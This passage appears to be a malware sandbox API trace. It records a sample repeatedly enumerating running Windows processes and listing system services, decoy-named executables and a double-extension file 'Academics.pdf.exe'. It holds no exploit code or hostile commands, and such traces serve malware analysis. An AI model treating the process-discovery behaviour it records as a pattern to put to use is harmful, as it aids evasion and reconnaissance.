lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0289.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0289.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0289.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0289.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0289.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0289.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0289.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0290.000] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0290.001] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0290.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0290.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0290.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0290.004] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0290.005] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0290.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0290.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0290.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0290.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0290.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0290.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0290.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0290.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0290.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0290.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0290.015] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0290.016] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.017] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0290.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.022] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0290.023] CloseHandle (hObject=0x294) returned 1 [0290.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0290.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0290.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0290.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0290.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0290.024] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0290.024] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0290.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0290.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0290.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0290.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0290.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0290.024] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0290.026] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.035] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0290.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0290.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0290.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0290.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.046] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0290.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0290.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0290.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0290.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0290.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0290.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0290.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0290.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0290.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0290.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0290.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0290.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0290.057] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0290.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0290.059] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, 